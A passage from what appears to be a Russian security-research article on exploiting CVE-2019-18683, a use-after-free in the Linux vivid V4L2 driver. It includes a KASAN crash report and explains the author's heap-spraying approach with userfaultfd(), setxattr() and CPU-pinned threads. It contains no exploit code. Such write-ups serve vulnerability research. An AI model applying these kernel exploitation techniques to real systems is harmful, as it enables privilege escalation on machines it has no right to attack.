\u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 <code>vb2_buffer<\/code>. \u042d\u0442\u043e \u043d\u0430\u0447\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u0442\u0430\u0434\u0438\u044f \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u043f\u043e\u0440\u0447\u0435 \u044f\u0434\u0435\u0440\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438.<\/p>\n<p>  <\/p>\n<h2 id=\"obmanutaya-podsistema-v4l2\">\u041e\u0431\u043c\u0430\u043d\u0443\u0442\u0430\u044f \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0430 V4L2<\/h2>\n<p>  <\/p>\n<p>\u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d. \u041f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0430 <code>V4L2<\/code> \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e <code>vb2_core_queue_release()<\/code>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432. \u041e\u043d\u0430 \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e <code>__vb2_queue_free()<\/code>, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0430\u0435\u0442 \u043d\u0430\u0448 <code>vb2_buffer<\/code>, \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0432 \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u043d\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0438 \u0433\u043e\u043d\u043a\u0438.<\/p>\n<p>  <\/p>\n<p>\u041d\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440 <code>vivid<\/code> \u043d\u0435 \u043e\u0441\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d \u043e\u0431 \u044d\u0442\u043e\u043c \u0438 \u0432\u0441\u0435 \u0435\u0449\u0435 \u0438\u043c\u0435\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u043d\u044b\u0439 \u043e\u0431\u044a\u0435\u043a\u0442. \u041a\u043e\u0433\u0434\u0430 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0441\u043d\u043e\u0432\u0430 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0438\u0442\u0435\u0440\u0430\u0446\u0438\u0438 \u0446\u0438\u043a\u043b\u0430 \u0432 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0435, \u0434\u0430\u043d\u043d\u044b\u0439 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u0440\u0430\u0437\u044b\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u042d\u0442\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0442\u043b\u0430\u0434\u043e\u0447\u043d\u044b\u043c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u043c KASAN:<\/p>\n<p>  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u041e\u0442\u0447\u0435\u0442 KASAN<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"plaintext\"> ==================================================================  BUG: KASAN: use-after-free in vid_cap_buf_queue+0x188\/0x1c0  Write of size 8 at addr ffff8880798223a0 by task v4l2-crasher\/300   CPU: 1 PID: 300 Comm: v4l2-crasher Tainted: G        W         5.4.0-rc2+ #3  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20190727_073836-buildvm-ppc64le-16.ppc.fedoraproject.org-3.fc31 04\/01\/2014  Call Trace:   dump_stack+0x5b\/0x90   print_address_description.constprop.0+0x16\/0x200   ? vid_cap_buf_queue+0x188\/0x1c0   ? vid_cap_buf_queue+0x188\/0x1c0   __kasan_report.cold+0x1a\/0x41   ? vid_cap_buf_queue+0x188\/0x1c0   kasan_report+0xe\/0x20   vid_cap_buf_queue+0x188\/0x1c0   vb2_start_streaming+0x222\/0x460   vb2_core_streamon+0x111\/0x240   __vb2_init_fileio+0x816\/0xa30   __vb2_perform_fileio+0xa88\/0x1120   ? kmsg_dump_rewind_nolock+0xd4\/0xd4   ? vb2_thread_start+0x300\/0x300   ? __mutex_lock_interruptible_slowpath+0x10\/0x10   vb2_fop_read+0x249\/0x3e0   v4l2_read+0x1bf\/0x240   vfs_read+0xf6\/0x2d0   ksys_read+0xe8\/0x1c0   ? kernel_write+0x120\/0x120   ? __ia32_sys_nanosleep_time32+0x1c0\/0x1c0   ? do_user_addr_fault+0x433\/0x8d0   do_syscall_64+0x89\/0x2e0   ? prepare_exit_to_usermode+0xec\/0x190   entry_SYSCALL_64_after_hwframe+0x44\/0xa9  RIP: 0033:0x7f3a8ec8222d  Code: c1 20 00 00 75 10 b8 00 00 00 00 0f 05 48 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 4e fc ff ff 48 89 04 24 b8 00 00 00 00 0f 05 &lt;48&gt; 8b 3c 24 48 89 c2 e8 97 fc ff ff 48 89 d0 48 83 c4 08 48 3d 01  RSP: 002b:00007f3a8d0d0e80 EFLAGS: 00000293 ORIG_RAX: 0000000000000000  RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f3a8ec8222d  RDX: 0000000000fffded RSI: 00007f3a8d8d3000 RDI: 0000000000000003  RBP: 00007f3a8d0d0f50 R08: 0000000000000001 R09: 0000000000000026  R10: 000000000000060e R11: 0000000000000293 R12: 00007ffc8d26495e  R13: 00007ffc8d26495f R14: 00007f3a8c8d1000 R15: 0000000000000003   Allocated by task 299:   save_stack+0x1b\/0x80   __kasan_kmalloc.constprop.0+0xc2\/0xd0   __vb2_queue_alloc+0xd9\/0xf20   vb2_core_reqbufs+0x569\/0xb10   __vb2_init_fileio+0x359\/0xa30   __vb2_perform_fileio+0xa88\/0x1120   vb2_fop_read+0x249\/0x3e0   v4l2_read+0x1bf\/0x240   vfs_read+0xf6\/0x2d0   ksys_read+0xe8\/0x1c0   do_syscall_64+0x89\/0x2e0   entry_SYSCALL_64_after_hwframe+0x44\/0xa9   Freed by task 300:   save_stack+0x1b\/0x80   __kasan_slab_free+0x12c\/0x170   kfree+0x90\/0x240   __vb2_queue_free+0x686\/0x7b0   vb2_core_reqbufs.cold+0x1d\/0x8a   __vb2_cleanup_fileio+0xe9\/0x140   vb2_core_queue_release+0x12\/0x70   _vb2_fop_release+0x20d\/0x290   v4l2_release+0x295\/0x330   __fput+0x245\/0x780   task_work_run+0x126\/0x1b0   exit_to_usermode_loop+0x102\/0x120   do_syscall_64+0x234\/0x2e0   entry_SYSCALL_64_after_hwframe+0x44\/0xa9   The buggy address belongs to the object at ffff888079822000   which belongs to the cache kmalloc-1k of size 1024  The buggy address is located 928 bytes inside of   1024-byte region [ffff888079822000, ffff888079822400)  The buggy address belongs to the page:  page:ffffea0001e60800 refcount:1 mapcount:0 mapping:ffff88802dc03180 index:0xffff888079827800 compound_mapcount: 0  flags: 0x500000000010200(slab|head)  raw: 0500000000010200 ffffea0001e77c00 0000000200000002 ffff88802dc03180  raw: ffff888079827800 000000008010000c 00000001ffffffff 0000000000000000  page dumped because: kasan: bad access detected   Memory state around the buggy address:   ffff888079822280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb   ffff888079822300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  &gt;ffff888079822380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb                                 ^   ffff888079822400: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc   ffff888079822480: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc  ==================================================================<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  <\/p>\n<p>\u041a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0432\u0438\u0434\u0435\u0442\u044c \u0432 \u0434\u0430\u043d\u043d\u043e\u043c \u043e\u0442\u0447\u0435\u0442\u0435 KASAN, \u043e\u0448\u0438\u0431\u043a\u0430 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043f\u0440\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0435 \u043a \u043e\u0431\u044a\u0435\u043a\u0442\u0443 \u0438\u0437 \u043a\u044d\u0448\u0430 <code>kmalloc-1k<\/code> \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u0430\u043b\u043b\u043e\u043a\u0430\u0442\u043e\u0440\u0430. \u0414\u0430\u043d\u043d\u044b\u0439 \u043a\u044d\u0448 \u0443\u0434\u043e\u0431\u0435\u043d \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f, \u0442\u0430\u043a \u043a\u0430\u043a \u043e\u0431\u044a\u0435\u043a\u0442\u044b \u0438\u0437 \u043d\u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u044f\u0434\u0440\u0435 \u0440\u0435\u0436\u0435, \u0447\u0435\u043c \u043e\u0431\u044a\u0435\u043a\u0442\u044b \u043c\u0435\u043d\u044c\u0448\u0435\u0433\u043e \u0440\u0430\u0437\u043c\u0435\u0440\u0430. \u042d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0442\u0435\u0445\u043d\u0438\u043a\u0443 <code>heap spraying<\/code> \u0431\u043e\u043b\u0435\u0435 \u0442\u043e\u0447\u043d\u043e\u0439.<\/p>\n<p>  <\/p>\n<h2 id=\"heap-spraying\">Heap spraying<\/h2>\n<p>  <\/p>\n<p><code>Heap spraying<\/code> \u2013 \u044d\u0442\u043e \u0442\u0435\u0445\u043d\u0438\u043a\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0446\u0435\u043b\u044c\u044e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u043e \u0437\u0430\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u0430\u0434\u0440\u0435\u0441\u0443 \u0432 \u043a\u0443\u0447\u0435 (heap). \u041e\u0431\u044b\u0447\u043d\u043e \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0437\u043d\u0430\u043d\u0438\u044f \u043e \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0438 \u0430\u043b\u043b\u043e\u043a\u0430\u0442\u043e\u0440\u0430 \u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0432 \u043a\u0443\u0447\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043e\u0431\u044a\u0435\u043a\u0442\u043e\u0432 \u0441 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u044b\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442 \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c.<\/p>\n<p>  <\/p>\n<p>\u0412 \u044f\u0434\u0440\u0435 Linux \u0443 slab-\u0430\u043b\u043b\u043e\u043a\u0430\u0442\u043e\u0440\u0430 \u0435\u0441\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0430\u044f \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c: \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 <code>kmalloc()<\/code> \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0442\u043e\u0442 \u044d\u043b\u0435\u043c\u0435\u043d\u0442 \u0432 slab-\u043a\u044d\u0448\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d (\u044d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438). \u041d\u0430 \u044d\u0442\u043e\u043c \u043e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0442\u0435\u0445\u043d\u0438\u043a\u0430 <code>heap spraying<\/code> \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f: \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u043d\u043e\u0433\u043e \u044f\u0434\u0435\u0440\u043d\u043e\u0433\u043e \u043e\u0431\u044a\u0435\u043a\u0442\u0430 \u0432 \u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u0434\u0440\u0443\u0433\u043e\u0439 \u043e\u0431\u044a\u0435\u043a\u0442 \u0442\u043e\u0433\u043e \u0436\u0435 \u0440\u0430\u0437\u043c\u0435\u0440\u0430, \u043d\u043e \u0441 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u0438\u0440\u0443\u0435\u043c\u044b\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u044b\u043c. \u042d\u0442\u043e \u043e\u0442\u0440\u0430\u0436\u0435\u043d\u043e \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0441\u0445\u0435\u043c\u0435:<\/p>\n<p>  <\/p>\n<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/876\/c74\/b84\/876c74b84cf1d3750c45fea6e819a5ff.png\" alt=\"use-after-free exploiting\"><\/p>\n<p>  <\/p>\n<p>\u0415\u0441\u0442\u044c <a href=\"https:\/\/duasynt.com\/blog\/linux-kernel-heap-spray\">\u043e\u0442\u043b\u0438\u0447\u043d\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f<\/a> \u0412\u0438\u0442\u0430\u043b\u0438\u044f \u041d\u0438\u043a\u043e\u043b\u0435\u043d\u043a\u043e, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043e\u043d \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u044d\u0444\u0444\u0435\u043a\u0442\u0438\u0432\u043d\u0443\u044e \u043c\u0435\u0442\u043e\u0434\u0438\u043a\u0443 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e\u0441\u043b\u0435 \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u044f\u0434\u0440\u0435 Linux. \u041e\u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 <code>userfaultfd()<\/code> \u0438 <code>setxattr()<\/code>. \u041e\u0447\u0435\u043d\u044c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c\u0441\u044f \u0441 \u043d\u0435\u0439 \u0434\u043e \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u044c \u0447\u0442\u0435\u043d\u0438\u0435 \u043c\u043e\u0435\u0439 \u0441\u0442\u0430\u0442\u044c\u0438. \u0413\u043b\u0430\u0432\u043d\u0430\u044f \u0438\u0434\u0435\u044f \u0441\u043e\u0441\u0442\u043e\u0438\u0442 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e <code>userfaultfd()<\/code> \u0434\u0430\u0435\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c \u0436\u0438\u0437\u043d\u0438 \u0434\u0430\u043d\u043d\u044b\u0445, \u0440\u0430\u0437\u043c\u0435\u0449\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u044f\u0434\u0440\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>setxattr()<\/code>. \u042d\u0442\u043e\u0442 \u0442\u0440\u044e\u043a \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u0438\u0433\u043e\u0434\u0438\u043b\u0441\u044f \u043c\u043d\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CVE-2019-18683.<\/p>\n<p>  <\/p>\n<p>\u041a\u0430\u043a \u0431\u044b\u043b\u043e \u043e\u043f\u0438\u0441\u0430\u043d\u043e \u0432\u044b\u0448\u0435, <code>vb2_buffer<\/code> \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0438 \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u0430 \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043f\u043e\u0437\u0436\u0435, \u043a\u043e\u0433\u0434\u0430 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0441\u043d\u043e\u0432\u0430. \u042d\u0442\u0430 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u0432 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: <code>heap spraying<\/code> \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u043a\u0440\u044b\u0442\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0433\u043e \u0434\u0435\u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430! \u041d\u043e \u0441 \u044d\u0442\u0438\u043c \u0435\u0441\u0442\u044c \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438: <code>__vb2_queue_free()<\/code> \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0430\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 <code>vb2_buffer<\/code> \u043d\u0435 \u0441\u0430\u043c\u044b\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c. \u0414\u0440\u0443\u0433\u0438\u043c\u0438 \u0441\u043b\u043e\u0432\u0430\u043c\u0438, \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 <code>kmalloc()<\/code> \u043d\u0435 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u043d\u0443\u0436\u043d\u044b\u0439 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0434\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 <code>setxattr()<\/code> \u043d\u0435 \u0445\u0432\u0430\u0442\u0430\u0435\u0442 \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u0430\u0442\u044c \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043e\u0431\u044a\u0435\u043a\u0442, \u0438 \u043d\u0443\u0436\u043d\u043e \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u00ab\u0441\u043f\u0440\u0435\u0439\u00bb.<\/p>\n<p>  <\/p>\n<p>\u042d\u0442\u043e \u043d\u0435 \u043e\u0447\u0435\u043d\u044c \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442\u0441\u044f \u0441 \u043c\u0435\u0442\u043e\u0434\u0438\u043a\u043e\u0439 \u0412\u0438\u0442\u0430\u043b\u0438\u044f \u041d\u0438\u043a\u043e\u043b\u0435\u043d\u043a\u043e: \u043f\u0440\u043e\u0446\u0435\u0441\u0441, \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0439 <code>setxattr()<\/code> <strong>\u0437\u0430\u0432\u0438\u0441\u0430\u0435\u0442<\/strong> \u0434\u043e \u0442\u0435\u0445 \u043f\u043e\u0440, \u043f\u043e\u043a\u0430 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a <code>userfaultfd()<\/code> \u043d\u0435 \u0432\u044b\u0437\u043e\u0432\u0435\u0442 <code>UFFDIO_COPY<\/code> ioctl. \u0415\u0441\u043b\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u043e\u0441\u0442\u0430\u043b\u0430\u0441\u044c \u0432 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u043c \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0435 \u044f\u0434\u0440\u0430, \u0434\u0430\u043d\u043d\u044b\u0439 ioctl \u0432\u043e\u043e\u0431\u0449\u0435 \u043d\u0435 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c. \u042f \u043e\u0431\u043e\u0448\u0435\u043b \u044d\u0442\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u043c\u0435\u0442\u043e\u0434\u043e\u043c \u0433\u0440\u0443\u0431\u043e\u0439 \u0441\u0438\u043b\u044b \u2013 \u0441\u043e\u0437\u0434\u0430\u043b \u0446\u0435\u043b\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 \u043f\u043e\u0442\u043e\u043a\u043e\u0432 (pthreads) \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f <code>heap spraying<\/code>. \u041a\u0430\u0436\u0434\u044b\u0439 \u043f\u043e\u0442\u043e\u043a \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 <code>setxattr()<\/code> \u0441 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c <code>userfaultfd()<\/code> \u0438 \u0437\u0430\u0432\u0438\u0441\u0430\u0435\u0442. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043f\u043e\u0442\u043e\u043a\u0438 \u0440\u0430\u0441\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u044b \u043c\u0435\u0436\u0434\u0443 CPU \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>sched_setaffinity()<\/code> \u0434\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u0438\u044f \u044f\u0434\u0435\u0440\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u043b\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 slab-\u043a\u044d\u0448\u0430\u0445 (\u043a \u043a\u0430\u0436\u0434\u043e\u043c\u0443 CPU \u043f\u0440\u0438\u0432\u044f\u0437\u0430\u043d \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0439 slab-\u043a\u044d\u0448).<\/p>\n<p>  <\/p>\n<p>\u0410 \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0435, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e <code>vb2_buffer<\/code>. \u042f \u043e\u043f\u0438\u0448\u0443 \u044d\u0442\u0430\u043f\u044b \u0435\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0432 \u0445\u0440\u043e\u043d\u043e\u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043f\u043e\u0440\u044f\u0434\u043a\u0435.<\/p>\n<p>  <\/p>\n<h2 id=\"perehvat-potoka-ispolneniya-v-podsisteme-v4l2\">\u041f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u043f\u043e\u0442\u043e\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 V4L2<\/h2>\n<p>  <\/p>\n<p><code>V4L2<\/code> \u2013 \u043e\u0447\u0435\u043d\u044c \u0441\u043b\u043e\u0436\u043d\u0430\u044f \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u044f\u0434\u0440\u0430 Linux. \u0415\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a <code>Video for Linux version 2<\/code>. \u041d\u0430 \u0441\u0445\u0435\u043c\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u0432\u0437\u0430\u0438\u043c\u043e\u0441\u0432\u044f\u0437\u0438 \u043c\u0435\u0436\u0434\u0443 \u043e\u0431\u044a\u0435\u043a\u0442\u0430\u043c\u0438, \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 